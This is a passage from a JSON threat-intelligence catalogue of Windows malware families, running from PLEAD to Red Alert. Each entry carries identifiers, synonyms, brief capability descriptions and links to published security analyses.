"value": "PLEAD" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/" ], "synonyms": [], "type": [] }, "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", "value": "Plexor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" ], "synonyms": [], "type": [] }, "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", "value": "Ploutus ATM" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" ], "synonyms": [], "type": [] }, "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", "value": "ployx" }, { "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that has been around since 2008 and is used as a backdoor to fully control the victim's machine. 
Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://community.rsa.com/thread/185439", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" ], "synonyms": [ "Korplug" ], "type": [] }, "uuid": 
"036bd099-fe80-46c2-9c4c-e5c6df8dcdee", "value": "PlugX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" ], "synonyms": [], "type": [] }, "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", "value": "pngdowner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "http://blogs.360.cn/post/APT_C_01_en.html", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" ], "synonyms": [ "pivy", "poisonivy" ], "type": [] }, "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", "value": "Poison Ivy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" ], "synonyms": [], "type": [] }, "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", "value": "Polyglot" }, { "description": 
"", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://github.com/nyx0/Pony" ], "synonyms": [ "Fareit", "Siplog" ], "type": [] }, "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", "value": "Pony" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" ], "synonyms": [], "type": [] }, "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", "value": "PoohMilk Loader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", "https://twitter.com/malwrhunterteam/status/806595092177965058" ], "synonyms": [], "type": [] }, "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", "value": "Popcorn Time" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" ], "synonyms": [], "type": [] }, "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", "value": "portless" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" ], "synonyms": [], "type": [] }, "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", "value": "poscardstealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" ], "synonyms": [], 
"type": [] }, "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", "value": "Poweliks Dropper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" ], "synonyms": [], "type": [] }, "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", "value": "PowerDuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" ], "synonyms": [], "type": [] }, "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", "value": "PowerPool" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", "https://lokalhost.pl/gozi_tree.txt" ], "synonyms": [], "type": [] }, "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", "value": "Powersniff" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "606f778a-8b99-4880-8da8-b923651d627b", "value": "PowerRatankba" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" ], "synonyms": [], "type": [] }, "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", "value": "prb_backdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", 
"https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" ], "synonyms": [], "type": [] }, "uuid": "54041c03-5714-4247-9226-3c801f59bc07", "value": "Predator The Thief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" ], "synonyms": [], "type": [] }, "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", "value": "Prikorma" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502", "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/" ], "synonyms": [], "type": [] }, "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", "value": "Prilex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/", "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/" ], "synonyms": [], "type": [] }, "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", "value": "PrincessLocker" }, { "description": "According to Matthew Mesa, this is a modular bot. 
The name stems from the string PsiXMainModule in binaries until mid-September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have been observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], "type": [] }, "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", "value": "PsiX" }, { "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" ], "synonyms": [ "PSS" ], "type": [] }, "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", "value": "PC Surveillance System" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" ], "synonyms": [], "type": [] }, "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", "value": "Pteranodon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", "http://blog.alyac.co.kr/1853", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" ], "synonyms": [], "type": [] }, "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", "value": "PubNubRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" ], "synonyms": [], "type": 
[] }, "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", "value": "Punkey POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://github.com/n1nj4sec/pupy" ], "synonyms": [], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", "value": "pupy" }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, though that sophistication lies in the Pushdo control server rather than the trojan.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/", "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", "https://www.secureworks.com/research/pushdo", "http://malware-traffic-analysis.net/2017/04/03/index2.html" ], "synonyms": [], "type": [] }, "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", "value": "Pushdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" ], "synonyms": [], "type": [] }, "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", "value": "Putabmow" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", "value": "PvzOut" }, { 
"description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", "https://twitter.com/physicaldrive0/status/573109512145649664", "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html" ], "synonyms": [], "type": [] }, "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", "value": "pwnpos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", "https://www.youtube.com/watch?v=HfSQlC76_s4" ], "synonyms": [], "type": [] }, "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", "value": "Pykspa" }, { "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ "Locky Locker" ], "type": [] }, "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", "value": "PyLocky" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" ], "synonyms": [], "type": [] }, "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", "value": "Qaccel" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", "https://pages.phishlabs.com/rs/130-BFB-942/images/Qadars%20-%20Final.pdf", 
"https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/" ], "synonyms": [], "type": [] }, "uuid": "080b2071-2d69-4b76-962e-3d0142074bcb", "value": "Qadars" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", "http://contagiodump.blogspot.com/2010/11/template.html", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html" ], "synonyms": [ "Pinkslipbot", "Qbot" ], "type": [] }, "uuid": "2ccaccd0-8362-4224-8497-2012e7cc7549", "value": "QakBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost" ], "synonyms": [ "Tolouge" ], "type": [] }, "uuid": "28f35535-dd40-4ee2-8064-5acbe76d8d4c", "value": "QHost" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-everybody-gets-one-qtbot-used-distribute-trickbot-locky/" ], "synonyms": [ "qtproject" ], "type": [] }, "uuid": "e8240391-3e3d-4894-ba80-f8e8de8a8222", "value": "QtBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quant_loader", 
"https://malwarebreakdown.com/2017/10/10/malvertising-campaign-uses-rig-ek-to-drop-quant-loader-which-downloads-formbook/", "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", "https://blogs.forcepoint.com/security-labs/locky-distributor-uses-newly-released-quant-loader-sold-russian-underground", "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat", "https://blog.malwarebytes.com/threat-analysis/2018/03/an-in-depth-malware-analysis-of-quantloader/" ], "synonyms": [], "type": [] }, "uuid": "e6005ce5-3e3d-4dfb-8de7-3da45e89e549", "value": "Quant Loader" }, { "description": "Quasar RAT is a malware family written in .NET which is used by a variety of attackers. The malware is fully functional and open source, and is often packed to make analysis of the source more difficult.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/quasar/QuasarRAT/tree/master/Client", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", "https://twitter.com/malwrhunterteam/status/789153556255342596", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments" ], "synonyms": [], "type": [] }, "uuid": "05252643-093b-4070-b62f-d5836683a9fa", "value": 
"Quasar RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.r980", "https://otx.alienvault.com/pulse/57976b52b900fe01376feb01/" ], "synonyms": [], "type": [] }, "uuid": "06f63e6b-d177-4e21-b432-e3a219bc0965", "value": "r980" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radamant", "https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/" ], "synonyms": [], "type": [] }, "uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c", "value": "Radamant" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat", "https://labs.bitdefender.com/2018/04/radrat-an-all-in-one-toolkit-for-complex-espionage-ops/" ], "synonyms": [], "type": [] }, "uuid": "271752e3-67ca-48bc-ade2-30eec11defca", "value": "RadRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rakhni", "https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/" ], "synonyms": [], "type": [] }, "uuid": "cf6887d9-3d68-4f89-9d61-e97dcc4d8c20", "value": "Rakhni" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" ], "synonyms": [ "brebsd" ], "type": [] }, "uuid": "805b99d1-233d-4f7f-b343-440e5d507494", "value": "Rambo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo" ], "synonyms": [], "type": [] }, "uuid": "51f53823-d289-4176-af45-3fca7eda824b", "value": "Ramdo" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit", "https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/", "http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html", "http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html", 
"https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/", "https://research.checkpoint.com/ramnits-network-proxy-servers/", "http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf" ], "synonyms": [ "Nimnul" ], "type": [] }, "uuid": "542161c0-47a4-4297-baca-5ed98386d228", "value": "Ramnit" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus", "https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/", "https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/", "http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html", "https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/" ], "synonyms": [], "type": [] }, "uuid": "5d9a27e7-3110-470a-ac0d-2bf00cac7846", "value": "Ranbyus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ranscam", "http://blog.talosintel.com/2016/07/ranscam.html" ], "synonyms": [], "type": [] }, "uuid": "50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b", "value": "Ranscam" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransoc", "https://www.proofpoint.com/us/threat-insight/post/ransoc-desktop-locking-ransomware-ransacks-local-files-social-media-profiles" ], "synonyms": [], "type": [] }, "uuid": "5310903e-0704-4ca4-ab1b-52d243dddb06", "value": "Ransoc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock", "https://forum.malekal.com/viewtopic.php?t=36485&start=", "https://www.symantec.com/security_response/writeup.jsp?docid=2012-022215-2340-99&tabid=2" ], "synonyms": [ "WinLock" ], "type": [] }, "uuid": "3e47c926-eea3-4fba-915a-1f3c5b92a94c", "value": "Ransomlock" }, { "description": "", "meta": { "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom", "https://twitter.com/malwrhunterteam/status/997748495888076800", "https://twitter.com/malwrhunterteam/status/977275481765613569" ], "synonyms": [], "type": [] }, "uuid": "06929ad3-2a00-4212-b171-9ecb5f956af5", "value": "Rapid Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_stealer", "http://pwc.blogs.com/cyber_security_updates/2014/09/malware-microevolution.html" ], "synonyms": [], "type": [] }, "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", "value": "RapidStealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarstar", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [], "type": [] }, "uuid": "e0a1407f-2595-4bd2-ba16-2c6d9be4e066", "value": "rarstar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ratabankapos", "http://blog.trex.re.kr/3", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], "type": [] }, "uuid": "15b85bac-c58b-41fd-8332-cfac7c445e0d", "value": "RatabankaPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos", "https://threatvector.cylance.com/en_us/home/rawpos-malware.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite" ], "synonyms": [], "type": [] }, "uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7", "value": "RawPOS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], "synonyms": [ "Crisis", "Remote Control System" ], "type": [] }, "uuid": "c359c74e-4155-4e66-a344-b56947f75119", 
"value": "RCS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rdasrv", "https://www.wired.com/wp-content/uploads/2014/09/wp-pos-ram-scraper-malware.pdf" ], "synonyms": [], "type": [] }, "uuid": "1bf3469a-b9c8-497a-bcbb-b1095386706a", "value": "rdasrv" }, { "description": "Please note: ReactorBot in its naming is often mistakenly labeled as Rovnix. ReactorBot is a full blown bot with modules, whereas Rovnix is just a bootkit / driver component (originating from Carberp), occasionally delivered alongside ReactorBot.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reactorbot", "https://www.symantec.com/connect/blogs/new-carberp-variant-heads-down-under", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/rovnix-infects-systems-with-password-protected-macros/", "http://www.malwaredigger.com/2015/06/rovnix-payload-and-plugin-analysis.html" ], "synonyms": [], "type": [] }, "uuid": "9d58d94f-6885-4a38-b086-b9978ac62c1f", "value": "ReactorBot" }, { "description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. 
The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/" ], "synonyms": [], "type": [] }, "uuid": "826c31ca-2617-47e4-b236-205da3881182", "value": "Reaver" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redalpha", "https://www.recordedfuture.com/redalpha-cyber-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://blog.macnica.net/blog/2017/12/post-8c22.html", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" ], "synonyms": [], "type": [] }, "uuid": "a70e93a7-3578-47e1-9926-0818979ed866", "value": "RedLeaves" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms", "https://www.welivesecurity.com/2013/02/04/what-do-win32redyms-and-tdl4-have-in-common/" ], "synonyms": [], "type": [] }, "uuid": "36893c2a-28ad-4dd3-a66b-906f1dd15b92", "value": "Redyms" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_alert", 
